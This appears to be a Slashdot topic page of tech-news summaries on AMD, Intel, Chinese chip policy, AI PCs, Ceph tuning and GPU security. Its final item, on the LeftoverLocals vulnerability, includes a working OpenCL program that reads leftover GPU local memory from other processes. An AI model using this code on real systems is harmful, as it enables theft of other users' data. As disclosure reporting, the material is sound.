Intel

China Tells Telecom Carriers To Phase Out Foreign Chips in Blow To Intel, AMD (wsj.com) 45

China's push to replace foreign technology is now focused on cutting American chip makers out of the country's telecoms systems. From a report: Officials earlier this year directed the nation's largest telecom carriers to phase out foreign processors that are core to their networks by 2027, a move that would hit American chip giants Intel and Advanced Micro Devices, people familiar with the matter said. The deadline given by China's Ministry of Industry and Information Technology aims to accelerate efforts by Beijing to halt the use of such core chips in its telecom infrastructure. The regulator ordered state-owned mobile operators to inspect their networks for the prevalence of non-Chinese semiconductors and draft timelines to replace them, the people said.

In the past, efforts to get the industry to wean itself off foreign semiconductors have been hindered by the lack of good domestically made chips. Chinese telecom carriers' procurements show they are switching more to domestic alternatives, a move made possible in part because local chips' quality has improved and their performance has become more stable, the people said. Such an effort will hit Intel and AMD the hardest, they said. The two chip makers have in recent years provided the bulk of the core processors used in networking equipment in China and around the world.

Operating Systems

VMS Software Prunes OpenVMS Hobbyist Program (theregister.com) 60

Liam Proven reports via The Register: Bad news for those who want to play with OpenVMS in non-production use. Older versions are disappearing, and the terms are getting much more restrictive. The corporation behind the continued development of OpenVMS, VMS Software, Inc. -- or VSI to its friends, if it has any left after this -- has announced the latest Updates to the Community Program. The news does not look good: you can't get the Alpha and Itanium versions any more, only a limited x86-64 edition.

OpenVMS is one of the granddaddies of big serious OSes. A direct descendant of the OSes that inspired DOS, CP/M, OS/2, and Windows, as well as the native OS of the hardware on which Unix first went 32-bit, VMS has been around for nearly half a century. For decades, its various owners have offered some flavor of "hobbyist program" under which you could get licenses to install and run it for free, as long as it wasn't in production use. After Compaq acquired DEC and HP in turn acquired Compaq, its prospects looked checkered. HP officially killed it off in 2013, then in 2014 granted it a reprieve and sold it off instead. New owner VSI ported it to x86-64, releasing that new version 9.2 in 2022. Around this time last year, we covered VSI adding AMD support and opening a hobbyist program of its own. It seems from the latest announcement that it has been disappointed by the reception: "Despite our initial aspirations for robust community engagement, the reality has fallen short of our expectations. The level of participation in activities such as contributing open source software, creating wiki articles, and providing assistance on forums has not matched the scale of the program. As a result, we find ourselves at a crossroads, compelled to reassess and recalibrate our approach."

Although HPE stopped offering hobbyist licenses for the original VAX versions of OpenVMS in 2020, VSI continued to maintain OpenVMS 8 (in other words, the Alpha and Itanium editions) while it worked on version 9 for x86-64. VSI even offered a Student Edition, which included a freeware Alpha emulator and a copy of OpenVMS 8.4 to run inside it. Those licenses run out in 2025, and they won't be renewed. If you have vintage DEC Alpha or HP Integrity boxes with Itanic chips, you won't be able to get a legal licensed copy of OpenVMS for them, or renew the license of any existing installations -- unless you pay, of course. There will still be a Community license edition, but from now on it's x86-64 only. Although OpenVMS 9 mainly targets hypervisors anyway, it does support bare-metal operations on a single model of HPE server, the ProLiant DL380 Gen10. If you have one of them to play with -- well, tough. Now Community users only get a VM image, supplied as a VMware .vmdk file. It contains a ready-to-go "OpenVMS system disk with OpenVMS, compilers and development tools installed." Its license runs for a year, after which you will get a fresh copy. This means you won't be able to configure your own system and keep it alive -- you'll have to recreate it, from scratch, annually. The only alternative for those with older systems is to apply to be an OpenVMS Ambassador.

AMD

AMD To Open Source Micro Engine Scheduler Firmware For Radeon GPUs 23

AMD plans to document and open source its Micro Engine Scheduler (MES) firmware for GPUs, giving users more control over Radeon graphics cards. From a report: It's part of a larger effort AMD confirmed earlier this week to make its GPUs more open source at both the software level, with respect to the ROCm stack for GPU programming, and the hardware level. Details were scarce in this initial announcement, and the only concrete thing it introduced was a GitHub tracker.

However, yesterday AMD divulged more details, specifying that one of the things it would be making open source was the MES firmware for Radeon GPUs. AMD says it will be publishing documentation for MES around the end of May, and will then release the source code some time afterward. For one George Hotz and his startup, Tiny Corp, this is great news. Throughout March, Hotz had agitated for AMD to make MES open source in order to fix issues he was experiencing with his RX 7900 XTX-powered AI server box. He had talked several times to AMD representatives, and even the company's CEO, Lisa Su.

AI

AI Leaders Press Advantage With Congress as China Tensions Rise (nytimes.com) 14

Silicon Valley chiefs are swarming the Capitol to try to sway lawmakers on the dangers of falling behind in the AI race. From a report: In recent weeks, American lawmakers have moved to ban the Chinese-owned app TikTok. President Biden reinforced his commitment to overcome China's rise in tech. And the Chinese government added chips from Intel and AMD to a blacklist of imports. Now, as the tech and economic cold war between the United States and China accelerates, Silicon Valley's leaders are capitalizing on the strife with a lobbying push for their interests in another promising field of technology: artificial intelligence.

On May 1, more than 100 tech chiefs and investors, including Alex Karp, the head of the defense contractor Palantir, and Roelof Botha, the managing partner of the venture capital firm Sequoia Capital, will come to Washington for a daylong conference and private dinner focused on drumming up more hawkishness toward China's progress in A.I. Dozens of lawmakers, including Speaker Mike Johnson, Republican of Louisiana, will also attend the event, the Hill & Valley Forum, which will include fireside chats and keynote discussions with members of a new House A.I. task force.

Tech executives plan to use the event to directly lobby against A.I. regulations that they consider onerous, as well as ask for more government spending on the technology and research to support its development. They also plan to ask the government to relax immigration restrictions to bring more A.I. experts to the United States. The event highlights an unusual area of agreement between Washington and Silicon Valley, which have long clashed on topics like data privacy, children's online protections and even China.

Microsoft

Microsoft's New Era of AI PCs Will Need a Copilot Key, Says Intel (theverge.com) 127

An anonymous reader shares a report: Intel, Microsoft, Qualcomm, and AMD have all been pushing the idea of an "AI PC" for months now as we head toward more AI-powered features in Windows. While we're still waiting to hear the finer details from Microsoft on its big plans for AI in Windows, Intel has started sharing Microsoft's requirements for OEMs to build an AI PC -- and one of the main ones is that an AI PC must have Microsoft's Copilot key. Microsoft wants its OEM partners to provide a combination of hardware and software for its idea of an AI PC. That includes a system that comes with a Neural Processing Unit (NPU), the latest CPUs and GPUs, and access to Copilot. It will also need to have the new Copilot key that Microsoft announced earlier this year.

This requirement means that some laptops that have already shipped with Intel's new Core Ultra chips, like Asus' new ROG Zephyrus, aren't technically AI PCs under Microsoft's strict requirements because they lack a Copilot key. But they're still AI PCs in Intel's eyes. "Our joint aligned definition, Intel and Microsoft, we've aligned on Core Ultra, Copilot, and Copilot key," explains Todd Lewellen, head of the PC ecosystem at Intel, in a press briefing with The Verge. "From an Intel perspective our AI PC has Core Ultra and it has an integrated NPU because it is unlocking all kinds of new capabilities and functions in the AI space. We have great alignment with Microsoft, but there are going to be some systems out there that may not have the physical key on it but it does have our integrated NPU."

Windows

Microsoft Has a New Windows and Surface Chief (theverge.com) 16

Tom Warren reports via The Verge: Microsoft is naming Pavan Davuluri as its new Windows and Surface chief today. After Panos Panay's surprise departure to Amazon last year, Microsoft split up the Windows and Surface groups under two different leaders. Davuluri took over the Surface silicon and devices work, with Mikhail Parakhin leading a new team focused on Windows and web experiences. Now both Windows and Surface will be Davuluri's responsibility, as Parakhin has "decided to explore new roles."

The Verge has obtained an internal memo from Rajesh Jha, Microsoft's head of experiences and devices, outlining the new Windows organization. Microsoft is now bringing together its Windows and devices teams once more. "This will enable us to take a holistic approach to building silicon, systems, experiences, and devices that span Windows client and cloud for this AI era," explains Jha. Pavan Davuluri is now the leader of Microsoft's Windows and Surface team, reporting directly to Rajesh Jha. Davuluri has worked at Microsoft for more than 23 years and was deeply involved in the company's work with Qualcomm and AMD to create custom Surface processors.

Mikhail Parakhin will now report to Kevin Scott during a transition phase, but his future at Microsoft looks uncertain, and it's likely those "new roles" will be outside the company. Parakhin had been working closely on Bing Chat before taking on the broader Windows engineering responsibilities and changes to Microsoft Edge. The Windows shake-up comes just days after Google DeepMind co-founder and former Inflection AI CEO Mustafa Suleyman joined Microsoft as the CEO of a new AI team. Microsoft also hired a bunch of Inflection AI employees, including co-founder Karen Simonyan who is now the chief scientist of Microsoft AI.

Power

As AI Booms, Land Near Nuclear Power Plants Becomes Hot Real Estate 77

Tobias Mann reports via The Register: The land surrounding a nuclear power plant might not sound like prime real estate, but as more bit barns seek to trim costs, it's poised to become a rather hot commodity. All datacenters are energy-hungry, but with more watt-greedy AI workloads on the horizon, nuclear power has fresh appeal, especially for hyperscalers. Such a shift in power also does wonders for greenwashing narratives around net-zero operations. While not technically renewable, nuclear power does have the benefit of being carbon-free, not to mention historically reliable -- with a few notable exceptions, of course. All of these are purported benefits cited by startup NE Edge, which has been fighting for more than a year to be able to build a pair of AI datacenters adjacent to the 2GW Millstone nuclear power plant in Waterford, Connecticut.

According to the Hartford Courant, NE Edge has secured $1.6 billion to construct the switching station and bit barns, which will span 1.2 million square feet in total. NE Edge will reportedly spend an equivalent sum on between 25,000 and 35,000 servers. Considering the price of GPU systems from Nvidia, AMD, and Intel, we suspect that those figures probably refer to the number of GPUs. We've asked NE Edge for more information. NE Edge has faced local challenges getting the project approved because residents are concerned the project would end up increasing the cost of electricity. The facilities will reportedly consume as much as 13 percent of the plant's output. The project's president, Thomas Quinn, attempted to quell concerns, arguing that by connecting directly to the plants, NE Edge will be able to negotiate prices that make building such a power-hungry facility viable in Connecticut. NE Edge has also committed to paying a 12.08 percent premium to the town on top of what it pays Dominion for power, along with other payments said to total more than $1 billion over the next 30 years. But the town council, which initially denied the sale of land to NE Edge back in January over a lack of information regarding the datacenter project, has reportedly yet to tell the company what information it is after.

China

China Blocks Use of Intel and AMD Chips in Government Computers (cnbc.com) 88

China has introduced new guidelines that will mean US microprocessors from Intel and AMD are phased out of government PCs and servers [Editor's note: the link may be paywalled; non-paywalled source], as Beijing ramps up a campaign to replace foreign technology with homegrown solutions. From a report: The stricter government procurement guidance also seeks to sideline Microsoft's Windows operating system and foreign-made database software in favour of domestic options. It runs alongside a parallel localisation drive under way in state-owned enterprises. The latest purchasing rules represent China's most significant step yet to build up domestic substitutes for foreign technology and echo moves in the US as tensions increase between the two countries. Washington has imposed sanctions on a growing number of Chinese companies on national security grounds, legislated to encourage more tech to be produced in the US and blocked exports of advanced chips and related tools to China.

Intel

Intel Awarded Up To $8.5 Billion in CHIPS Act Grants, With Billions More in Loans Available 29

The White House said Wednesday Intel has been awarded up to $8.5 billion in CHIPS Act funding, as the Biden administration ramps up its effort to bring semiconductor manufacturing to U.S. soil. From a report: Intel could receive an additional $11 billion in loans from the CHIPS and Science Act, which was passed in 2022. The awards will be announced by President Joe Biden in Arizona on Wednesday. The money will help "leading-edge semiconductors made in the United States" keep "America in the driver's seat of innovation," U.S. Secretary of Commerce Gina Raimondo said on a call with reporters. Intel and the White House said their agreement is nonbinding and preliminary and could change.

Intel has long been a stalwart of the U.S. semiconductor industry, developing chips that power many of the world's PCs and data center servers. However, the company has been eclipsed in revenue by Nvidia, which leads in artificial intelligence chips, and has been surpassed in market cap by rival AMD and mobile phone chipmaker Qualcomm.

AI

Jensen Huang Says Even Free AI Chips From Competitors Can't Beat Nvidia's GPUs 50

An anonymous reader shares a report: Nvidia CEO Jensen Huang recently took to the stage to claim that Nvidia's GPUs are "so good that even when the competitor's chips are free, it's not cheap enough." Huang further explained that Nvidia GPU pricing isn't really significant in terms of an AI data center's total cost of ownership (TCO). The impressive scale of Nvidia's achievements in powering the booming AI industry is hard to deny; the company recently became the world's third most valuable company thanks largely to its AI-accelerating GPUs, but Jensen's comments are sure to be controversial as he dismisses a whole constellation of competitors, from AMD and Intel to a range of companies offering ASICs and other types of custom AI silicon.

Starting at 22:32 of the YouTube recording, John Shoven, Former Trione Director of SIEPR and the Charles R. Schwab Professor Emeritus of Economics, Stanford University, asks, "You make completely state-of-the-art chips. Is it possible that you'll face competition that claims to be good enough -- not as good as Nvidia -- but good enough and much cheaper? Is that a threat?" Jensen Huang begins his response by unpacking his tiny violin. "We have more competition than anyone on the planet," claimed the CEO. He told Shoven that even Nvidia's customers are its competitors, in some cases. Also, Huang pointed out that Nvidia actively helps customers who are designing alternative AI processors and goes as far as revealing to them what upcoming Nvidia chips are on the roadmap.

AMD

AMD Stops Certifying Monitors, TVs Under 144 Hz For FreeSync (arstechnica.com) 49

An anonymous reader quotes a report from Ars Technica: AMD announced this week that it has ceased FreeSync certification for monitors or TVs whose maximum refresh rates are under 144 Hz. Previously, FreeSync monitors and TVs could have refresh rates as low as 60 Hz, allowing for screens with lower price tags and ones not targeted at serious gaming to carry the variable refresh-rate technology. AMD also boosted the refresh-rate requirements for its higher AdaptiveSync tiers, FreeSync Premium and FreeSync Premium Pro, from 120 Hz to 200 Hz.

The new minimum refresh-rate requirements haven't changed for laptops, and AMD will continue supporting already-certified FreeSync displays even if they don't meet the new requirements. Interestingly, AMD's minimum refresh-rate requirement for TVs goes beyond 120 Hz, the ceiling for many premium TVs today, since the current-generation Xbox and PlayStation support refresh rates of at most 120 frames per second (FPS). Announcing the changes this week in a blog post, Oguzhan Andic, AMD FreeSync and Radeon product marketing manager, claimed that the changes were necessary, noting that 60 Hz is no longer "considered great for gaming." Andic wrote that the majority of gaming monitors are now 144 Hz or higher, compared to 2015, when FreeSync debuted and even 120 Hz was "a rarity."

AMD

Huawei's New CPU Matches Zen 3 In Single-Core Performance (tomshardware.com) 77

Long-time Slashdot reader AmiMoJo quotes Tom's Hardware: A Geekbench 6 result features what is likely the first-ever look at the single-core performance of the Taishan V120, developed by Huawei's HiSilicon subsidiary (via @Olrak29_ on X). The single-core score indicates that Taishan V120 cores are roughly on par with AMD's Zen 3 cores from late 2020, which could mean Huawei's technology isn't that far behind cutting-edge Western chip designers.

The Taishan V120 core was first spotted in Huawei's Kirin 9000s smartphone chip, which uses four of the cores alongside two efficiency-focused Arm Cortex A510 cores. Since Kirin 9000s chips are produced using SMIC's second-generation 7nm node (which may make it illegal to sell internationally, according to U.S. lawmakers), it seems likely that the Taishan V120 core tested in Geekbench 6 is also made on the second-generation 7nm node.

The benchmark result doesn't really say much about what the actual CPU is, with the only hint being 'Huawei Cloud OpenStack Nova.' This implies it's a Kunpeng server CPU, which may either be the Kunpeng 916, 920, or 930. While we can only guess which one it is, it's almost certain to be the 930 given the high single-core performance shown in the result. By contrast, the few Geekbench 5 results for the Kunpeng 920 show it performing well behind AMD's first-generation Epyc Naples from 2017.

Microsoft

Microsoft is Working With Nvidia, AMD and Intel To Improve Upscaling Support in PC Games (theverge.com) 22

Microsoft has outlined a new Windows API designed to offer a seamless way for game developers to integrate super resolution AI-upscaling features from Nvidia, AMD, and Intel. From a report: In a new blog post, program manager Joshua Tucker describes Microsoft's new DirectSR API as the "missing link" between games and super resolution technologies, and says it should provide "a smoother, more efficient experience that scales across hardware."

"This API enables multi-vendor SR [super resolution] through a common set of inputs and outputs, allowing a single code path to activate a variety of solutions including Nvidia DLSS Super Resolution, AMD FidelityFX Super Resolution, and Intel XeSS," the post reads. The pitch seems to be that developers will be able to support this DirectSR API, rather than having to write code for each and every upscaling technology.

The blog post comes a couple of weeks after an "Automatic Super Resolution" feature was spotted in a test version of Windows 11, which promised to "use AI to make supported games play more smoothly with enhanced details." Now, it seems the feature will plug into existing super resolution technologies like DLSS, FSR, and XeSS rather than offering a Windows-level alternative.

IT

HDMI Forum Rejects Open-Source HDMI 2.1 Driver Support Sought By AMD (phoronix.com) 114

Michael Larabel, reporting at Phoronix: One of the limitations of AMD's open-source Linux graphics driver has been the inability to implement HDMI 2.1+ functionality due to legal requirements imposed by the HDMI Forum. AMD engineers had been working with the HDMI Forum on a solution for providing HDMI 2.1+ capabilities in their open-source Linux kernel driver, but it looks like those efforts have now concluded, and failed. For three years there has been a bug report about 4K@120Hz being unavailable via HDMI 2.1 on the AMD Linux driver. Similarly, there have been bug reports about 5K@240Hz not being possible either with the AMD graphics driver on Linux.

As covered back in 2021, the HDMI Forum closing public specification access is hurting open-source support. AMD as well as the X.Org Foundation have been engaged with the HDMI Forum to try to come up with a solution to be able to provide open-source implementations of the now-private HDMI specs. AMD Linux engineers have spent months working with their legal team and evaluating all HDMI features to determine if/how they can be exposed in their open-source driver. AMD had code working internally and then the past few months were waiting on approval from the HDMI Forum. Sadly, the HDMI Forum has turned down AMD's request for open-source driver support.

AMD

Despite Initial Claims, AMD Confirms Ryzen 8000G APUs Don't Support ECC RAM (tomshardware.com) 64

Slashdot reader ffkom shared this report from Tom's Hardware: When AMD formally introduced its Ryzen 8000G-series accelerated processing units for desktops in early January, the company mentioned that they supported ECC memory capability. Since then, the company has quietly removed mention of the technology from its website, as noted by Reddit users.

We asked AMD to clarify the situation and were told that the company has indeed removed mentions of ECC technology from the specifications of its Ryzen 3 8300G, Ryzen 5 8500G, Ryzen 5 8600G, and Ryzen 7 8700G. The technology also cannot be enabled on motherboards, so it looks like these processors indeed do not support ECC technology at all.

While it would be nice to have ECC support on AMD's latest consumer Ryzen 8000G APUs, this is a technology typically reserved for AMD's Ryzen Pro processors.

Open Source

AMD's CUDA Implementation Built On ROCm Is Now Open Source (phoronix.com) 29

Michael Larabel writes via Phoronix: While there have been efforts by AMD over the years to make it easier to port codebases targeting NVIDIA's CUDA API to run atop HIP/ROCm, it still requires work on the part of developers. The tooling has improved, such as with HIPIFY to help with auto-generating code, but it isn't a simple, instant, and guaranteed solution -- especially if striving for optimal performance. Over the past two years, though, AMD has quietly been funding an effort to bring binary compatibility, so that many NVIDIA CUDA applications can run atop the AMD ROCm stack at the library level -- a drop-in replacement without the need to adapt source code. In practice, for many real-world workloads, it's a solution for end users to run CUDA-enabled software without any developer intervention. Here is more information on this "skunkworks" project, which is now available as open source, along with some of my own testing and performance benchmarks of this CUDA implementation built for Radeon GPUs. [...]

For those wondering about the open-source code, it's dual-licensed under either Apache 2.0 or MIT. Rust fans will be excited to know the Rust programming language is leveraged for this Radeon implementation. [...] Those wanting to check out the new ZLUDA open-source code for Radeon GPUs can do so via GitHub.
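
To make the library-level, drop-in idea concrete, here is a minimal sketch of an ordinary CUDA driver-API client in C++ (our illustration, not code from the ZLUDA repository). Compiled against NVIDIA's cuda.h and linked with -lcuda, it is the kind of unmodified binary that ZLUDA aims to run on a Radeon system by substituting its own implementation of that same library:

    // zluda_probe.cpp -- sketch of an unmodified CUDA driver-API client.
    // Build (assumes the CUDA toolkit headers): g++ zluda_probe.cpp -lcuda -o zluda_probe
    #include <cuda.h>
    #include <cstdio>

    int main() {
        if (cuInit(0) != CUDA_SUCCESS) {
            std::fprintf(stderr, "no usable CUDA (or CUDA-compatible) driver found\n");
            return 1;
        }
        int count = 0;
        cuDeviceGetCount(&count);
        for (int i = 0; i < count; ++i) {
            CUdevice dev;
            char name[256];
            cuDeviceGet(&dev, i);
            cuDeviceGetName(name, sizeof(name), dev);
            // Under NVIDIA's libcuda this prints a GeForce/RTX name; under a
            // drop-in implementation such as ZLUDA it would report the Radeon GPU.
            std::printf("device %d: %s\n", i, name);
        }
        return 0;
    }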

Microsoft

Microsoft Working On Its Own DLSS-like Upscaler for Windows 11 (theverge.com) 42

Microsoft appears to be readying its own DLSS-like AI upscaling feature for PC games. From a report: X user PhantomOcean3 discovered the feature inside the latest test versions of Windows 11 over the weekend, with Microsoft describing its automatic super resolution as a way to "use AI to make supported games play more smoothly with enhanced details." That sounds a lot like Nvidia's Deep Learning Super Sampling (DLSS) technology, which uses AI to upscale games and improve frame rates and image quality. AMD and Intel also offer their own variants, with FSR and XeSS both growing in popularity in recent PC game releases.

AI

AI PCs To Account for Nearly 60% of All PC Shipments by 2027, IDC Says (idc.com) 70

IDC, in a press release: A new forecast from IDC shows shipments of artificial intelligence (AI) PCs -- personal computers with specific system-on-a-chip (SoC) capabilities designed to run generative AI tasks locally -- growing from nearly 50 million units in 2024 to more than 167 million in 2027. By the end of the forecast, IDC expects AI PCs will represent nearly 60% of all PC shipments worldwide. [...] Until recently, running an AI task locally on a PC was done on the central processing unit (CPU), the graphics processing unit (GPU), or a combination of the two. However, this can have a negative impact on the PC's performance and battery life because these chips are not optimized to run AI efficiently. PC silicon vendors have now introduced AI-specific silicon to their SoCs called neural processing units (NPUs) that run these tasks more efficiently.

To date, IDC has identified three types of NPU-enabled AI PCs:
1. Hardware-enabled AI PCs include an NPU that offers less than 40 tera operations per second (TOPS) performance and typically enables specific AI features within apps to run locally. Qualcomm, Apple, AMD, and Intel are all shipping chips in this category today.

2. Next-generation AI PCs include an NPU with 40 to 60 TOPS performance and an AI-first operating system (OS) that enables persistent and pervasive AI capabilities in the OS and apps. Qualcomm, AMD, and Intel have all announced future chips for this category, with delivery expected to begin in 2024. Microsoft is expected to roll out major updates (and updated system specifications) to Windows 11 to take advantage of these high-TOPS NPUs.

3. Advanced AI PCs are PCs that offer more than 60 TOPS of NPU performance. While no silicon vendors have announced such products, IDC expects them to appear in the coming years. This IDC forecast does not include advanced AI PCs, but they will be incorporated into future updates.
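
As a trivial aside, the three categories reduce to thresholds on NPU throughput; a minimal sketch (ours, not IDC's) in C++:

    // npu_tiers.cpp -- classifies an NPU by the TOPS thresholds listed above.
    #include <cstdio>
    #include <initializer_list>

    const char* aiPcTier(double tops) {
        if (tops > 60)  return "advanced AI PC (>60 TOPS)";
        if (tops >= 40) return "next-generation AI PC (40-60 TOPS)";
        if (tops > 0)   return "hardware-enabled AI PC (<40 TOPS)";
        return "no NPU: not an AI PC under IDC's definition";
    }

    int main() {
        for (double tops : {11.0, 45.0, 75.0})
            std::printf("%.0f TOPS -> %s\n", tops, aiPcTier(tops));
    }
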
Michael Dell, commenting on X: This is correct and might be underestimating it. AI PCs are coming fast and Dell is ready.

Networking

Ceph: a Journey To 1 TiB/s (ceph.io) 16

It's "a free and open-source, software-defined storage platform," according to Wikipedia, providing object storage, block storage, and file storage "built on a common distributed cluster foundation". The charter advisory board for Ceph included people from Canonical, CERN, Cisco, Fujitsu, Intel, Red Hat, SanDisk, and SUSE.

And Nite_Hawk (Slashdot reader #1,304) is one of its core engineers — a former Red Hat principal software engineer named Mark Nelson. (He's now leading R&D for a small cloud systems company called Clyso that provides Ceph consulting.) And he's returned to Slashdot to share a blog post describing "a journey to 1 TiB/s". This gnarly tale-from-production starts with Clyso assisting "a fairly hip and cutting edge company that wanted to transition their HDD-backed Ceph cluster to a 10 petabyte NVMe deployment" using object-based storage devices [or OSDs]... I can't believe they figured it out first. That was the thought going through my head back in mid-December after several weeks of 12-hour days debugging why this cluster was slow... Half-forgotten superstitions from the 90s about appeasing SCSI gods flitted through my consciousness...

Ultimately they decided to go with a Dell architecture we designed, which was quoted at roughly 13% cheaper than the original configuration despite having several key advantages. The new configuration has less memory per OSD (still comfortably 12GiB each), but faster memory throughput. It also provides more aggregate CPU resources, significantly more aggregate network throughput, a simpler single-socket configuration, and utilizes the newest generation of AMD processors and DDR5 RAM. By employing smaller nodes, we halved the impact of a node failure on cluster recovery....

The initial single-OSD test looked fantastic for large reads and writes and showed nearly the same throughput we saw when running FIO tests directly against the drives. As soon as we ran the 8-OSD test, however, we observed a performance drop. Subsequent single-OSD tests continued to perform poorly until several hours later when they recovered. So long as a multi-OSD test was not introduced, performance remained high. Confusingly, we were unable to invoke the same behavior when running FIO tests directly against the drives. Just as confusing, we saw that during the 8 OSD test, a single OSD would use significantly more CPU than the others. A wallclock profile of the OSD under load showed significant time spent in io_submit, which is what we typically see when the kernel starts blocking because a drive's queue becomes full...

For over a week, we looked at everything from BIOS settings, NVMe multipath, low-level NVMe debugging, changing kernel/Ubuntu versions, and checking every single kernel, OS, and Ceph setting we could think of. None of these things fully resolved the issue. We even performed blktrace and iowatcher analysis during "good" and "bad" single OSD tests, and could directly observe the slow IO completion behavior. At this point, we started getting the hardware vendors involved. Ultimately it turned out to be unnecessary. One minor fix and two major ones got things back on track.

It's a long blog post, but here's where it ends up:
  • Fix One: "Ceph is incredibly sensitive to latency introduced by CPU c-state transitions. A quick check of the BIOS on these nodes showed that they weren't running in maximum performance mode, which disables c-states."
  • Fix Two: [A very clever engineer working for the customer] "ran a perf profile during a bad run and made a very astute discovery: A huge amount of time is spent in the kernel contending on a spin lock while updating the IOMMU mappings. He disabled IOMMU in the kernel and immediately saw a huge increase in performance during the 8-node tests." In a comment below, Nelson adds that "We've never seen the IOMMU issue before with Ceph... I'm hoping we can work with the vendors to understand better what's going on and get it fixed without having to completely disable IOMMU."
  • Fix Three: "We were not, in fact, building RocksDB with the correct compile flags... It turns out that Canonical fixed this for their own builds as did Gentoo after seeing the note I wrote in do_cmake.sh over 6 years ago... With the issue understood, we built custom 17.2.7 packages with a fix in place. Compaction time dropped by around 3X and 4K random write performance doubled."

The story has a happy ending, with performance testing eventually showing data being read at 635 GiB/s — and a colleague daring them to attempt 1 TiB/s. They built a new testing configuration targeting 63 nodes — achieving 950GiB/s — then tried some more performance optimizations...


Security

A Flaw In Millions of Apple, AMD, and Qualcomm GPUs Could Expose AI Data (wired.com) 22

An anonymous reader quotes a report from Wired: As more companies ramp up development of artificial intelligence systems, they are increasingly turning to graphics processing unit (GPU) chips for the computing power they need to run large language models (LLMs) and to crunch data quickly at massive scale. Between video game processing and AI, demand for GPUs has never been higher, and chipmakers are rushing to bolster supply. In new findings released today, though, researchers are highlighting a vulnerability in multiple brands and models of mainstream GPUs -- including Apple, Qualcomm, and AMD chips -- that could allow an attacker to steal large quantities of data from a GPU's memory. The silicon industry has spent years refining the security of central processing units, or CPUs, so they don't leak data in memory even when they are built to optimize for speed. However, since GPUs were designed for raw graphics processing power, they haven't been architected to the same degree with data privacy as a priority. As generative AI and other machine learning applications expand the uses of these chips, though, researchers from New York-based security firm Trail of Bits say that vulnerabilities in GPUs are an increasingly urgent concern. "There is a broader security concern about these GPUs not being as secure as they should be and leaking a significant amount of data," Heidy Khlaaf, Trail of Bits' engineering director for AI and machine learning assurance, tells WIRED. "We're looking at anywhere from 5 megabytes to 180 megabytes. In the CPU world, even a bit is too much to reveal."

To exploit the vulnerability, which the researchers call LeftoverLocals, attackers would need to already have established some amount of operating system access on a target's device. Modern computers and servers are specifically designed to silo data so multiple users can share the same processing resources without being able to access each others' data. But a LeftoverLocals attack breaks down these walls. Exploiting the vulnerability would allow a hacker to exfiltrate data they shouldn't be able to access from the local memory of vulnerable GPUs, exposing whatever data happens to be there for the taking, which could include queries and responses generated by LLMs as well as the weights driving the response. In their proof of concept, the researchers demonstrate an attack in which a target asks the open source LLM Llama.cpp to provide details about WIRED magazine. Within seconds, the attacker's device collects the majority of the response provided by the LLM by carrying out a LeftoverLocals attack on vulnerable GPU memory. The attack program the researchers created uses less than 10 lines of code. [...] Though exploiting the vulnerability would require some amount of existing access to targets' devices, the potential implications are significant given that it is common for highly motivated attackers to carry out hacks by chaining multiple vulnerabilities together. Furthermore, establishing "initial access" to a device is already necessary for many common types of digital attacks.
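
The core of the bug is that "local" (workgroup-scoped) GPU memory isn't cleared between kernels from different processes on affected chips. Below is a minimal sketch of the listener side as a C++ OpenCL host program (our illustration, not Trail of Bits' published PoC; error handling omitted for brevity): it requests a block of local memory, reads it without ever writing to it, and copies whatever was left behind back to the host. On patched or unaffected hardware the buffer should come back zeroed.

    // leftover_locals_sketch.cpp -- reads uninitialized GPU local memory.
    // Build (assumes an OpenCL SDK): g++ leftover_locals_sketch.cpp -lOpenCL
    #include <CL/cl.h>
    #include <cstdio>
    #include <vector>

    static const char* kSource = R"(
    __kernel void dump_local(__local uint* scratch, __global uint* out, uint n) {
        // Deliberately read local memory that this kernel never wrote.
        for (uint i = get_local_id(0); i < n; i += get_local_size(0))
            out[i] = scratch[i];
    })";

    int main() {
        const cl_uint N = 4096;                 // words of local memory to sample
        cl_platform_id plat; cl_device_id dev; cl_int err;
        clGetPlatformIDs(1, &plat, nullptr);
        clGetDeviceIDs(plat, CL_DEVICE_TYPE_GPU, 1, &dev, nullptr);
        cl_context ctx = clCreateContext(nullptr, 1, &dev, nullptr, nullptr, &err);
        cl_command_queue q = clCreateCommandQueueWithProperties(ctx, dev, nullptr, &err);
        cl_program prog = clCreateProgramWithSource(ctx, 1, &kSource, nullptr, &err);
        clBuildProgram(prog, 1, &dev, "", nullptr, nullptr);
        cl_kernel kern = clCreateKernel(prog, "dump_local", &err);
        cl_mem out = clCreateBuffer(ctx, CL_MEM_WRITE_ONLY, N * sizeof(cl_uint), nullptr, &err);
        clSetKernelArg(kern, 0, N * sizeof(cl_uint), nullptr); // uninitialized __local block
        clSetKernelArg(kern, 1, sizeof(out), &out);
        clSetKernelArg(kern, 2, sizeof(N), &N);
        size_t global = 256, local = 256;                      // a single workgroup
        clEnqueueNDRangeKernel(q, kern, 1, nullptr, &global, &local, 0, nullptr, nullptr);
        std::vector<cl_uint> host(N);
        clEnqueueReadBuffer(q, out, CL_TRUE, 0, N * sizeof(cl_uint), host.data(), 0, nullptr, nullptr);
        unsigned leftovers = 0;
        for (cl_uint w : host) leftovers += (w != 0);
        std::printf("%u of %u sampled words held leftover (nonzero) data\n", leftovers, N);
    }

A real attacker, per the researchers' description, would run such a listener repeatedly and scan the recovered memory for recognizable data, such as a victim process's LLM responses.
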
The researchers did not find evidence that Nvidia, Intel, or Arm GPUs contain the LeftoverLocals vulnerability, but Apple, Qualcomm, and AMD all confirmed to WIRED that they are impacted. Here's what each of the affected companies had to say about the vulnerability, as reported by Wired:

Apple: An Apple spokesperson acknowledged LeftoverLocals and noted that the company shipped fixes with its latest M3 and A17 processors, which it unveiled at the end of 2023. This means that the vulnerability is seemingly still present in millions of existing iPhones, iPads, and MacBooks that depend on previous generations of Apple silicon. On January 10, the Trail of Bits researchers retested the vulnerability on a number of Apple devices. They found that Apple's M2 MacBook Air was still vulnerable, but the third-generation iPad Air with an A12 chip appeared to have been patched.
Qualcomm: A Qualcomm spokesperson told WIRED that the company is "in the process" of providing security updates to its customers, adding, "We encourage end users to apply security updates as they become available from their device makers." The Trail of Bits researchers say Qualcomm confirmed it has released firmware patches for the vulnerability.
AMD: AMD released a security advisory on Wednesday detailing its plans to offer fixes for LeftoverLocals. The protections will be "optional mitigations" released in March.
Google: For its part, Google says in a statement that it "is aware of this vulnerability impacting AMD, Apple, and Qualcomm GPUs. Google has released fixes for ChromeOS devices with impacted AMD and Qualcomm GPUs."
